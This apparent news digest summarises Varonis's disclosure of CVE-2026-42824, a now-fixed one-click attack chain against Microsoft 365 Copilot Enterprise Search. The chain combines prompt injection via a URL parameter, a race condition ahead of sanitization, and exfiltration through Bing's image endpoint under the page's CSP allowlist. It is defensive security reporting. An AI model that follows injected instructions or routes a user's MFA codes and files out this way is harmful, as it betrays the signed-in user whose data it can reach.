The Hacker News web signal

Microsoft Copilot Bug Leaks MFA Codes via One Click

microsoft cybersecurity enterprise ai ai-security enterprise-ai copilot vulnerability

Key insights

  • CVE-2026-42824 chains three Copilot bugs, enabling one-click theft of MFA codes, password-reset links, and SharePoint files from any signed-in victim.
  • Bing's image endpoint acts as an exfiltration proxy under the page's CSP allowlist, making stolen data invisible to URL-based anti-phishing filters.
  • Varonis has now disclosed three Copilot prompt injection attacks of the same class, including EchoLeak (CVE-2025-32711) and the Reprompt attack on Copilot Personal.

Why this matters

Microsoft 365 Copilot Enterprise Search's access to Microsoft Graph means a single exploit can simultaneously reach email, MFA codes, calendar entries, and cloud files within one authenticated session, making the real blast radius far larger than the CVSS scores of 6.5 and 7.5 suggest. The Bing image-endpoint exfiltration route shows that CSP allowlists for first-party Microsoft infrastructure can themselves become data exfiltration channels, invalidating a common enterprise defense assumption about trusted-domain allowlisting. Varonis's pattern of three successive Copilot disclosures in the same prompt injection class signals that AI assistant search surfaces need dedicated red-team coverage, not just standard application security review.

Summary

Microsoft 365 Copilot Enterprise Search contained a three-bug chain that let an attacker steal MFA codes, password-reset links, and SharePoint files with a single click on a crafted Copilot URL. Varonis Threat Labs researcher Dolev Taler built the exploit by combining prompt injection via Copilot's URL parameter, a browser race condition that fires image requests before sanitization completes, and a CSP bypass that turns Bing's image endpoint into an exfiltration proxy. Because data routes through Bing's own server-side image fetch, standard URL-based phishing filters see no suspicious destination. Essentially: (Varonis, Microsoft) the fix was fully server-side with no patch or user action required; no exploitation in the wild was observed. - CVE-2026-42824 carries CVSS scores of 6.5 (Microsoft) vs. 7.5 (NVD), a notable split on a Microsoft-rated critical flaw. - Varonis has now disclosed three attacks of this Copilot prompt injection class, including EchoLeak (CVE-2025-32711) and the earlier Reprompt attack on Copilot Personal. - Data accessible to the victim's Microsoft Graph permissions determines blast radius: email, calendar, MFA codes, and cloud files all in scope. Three disclosures in the same attack class point to a structural prompt injection surface in Copilot that no single fix has fully closed.

Potential risks and opportunities

Risks

  • Enterprise organizations running Microsoft 365 Copilot Enterprise Search face retroactive audit pressure if compliance or legal teams determine MFA codes or password-reset links were accessible during the unpatched window
  • Microsoft's lower CVSS score of 6.5 vs. NVD's 7.5 for CVE-2026-42824 could lead security teams to under-prioritize incident investigation if they relied on Microsoft's rating alone
  • The Bing image-endpoint exfiltration channel, if not specifically restricted for all Copilot surfaces, can be reused in future prompt injection attacks beyond Enterprise Search

Opportunities

  • Varonis Threat Labs strengthens its enterprise AI security position with three successive Copilot prompt injection disclosures, giving it a concrete differentiation story in Microsoft 365 security sales cycles
  • Enterprise browser isolation vendors can position agent-aware CSP enforcement as a gap-closer for first-party-CDN exfiltration routes, using this disclosure as a live example
  • Microsoft could build a dedicated bug bounty tier for Copilot prompt injection chains, since three disclosures in the same class demonstrate the surface is broader than point-fix remediation can address

What we don't know yet

  • Whether Microsoft has audited other Copilot URL parameters and surfaces beyond the 'q' parameter for similar prompt injection flaws following this disclosure
  • Whether the Bing server-side image fetch endpoint has been rate-limited or otherwise restricted as an exfiltration channel, or remains usable for similar attacks on other Copilot surfaces
  • How long CVE-2026-42824 existed before Varonis discovered it, and whether access logs from the unpatched window could confirm or rule out prior exploitation

Originally reported by The Hacker News

Read the original article →

Original headline: SearchLeak: One-Click Attack Chains Three Microsoft 365 Copilot Bugs to Exfiltrate Emails, MFA Codes, and Files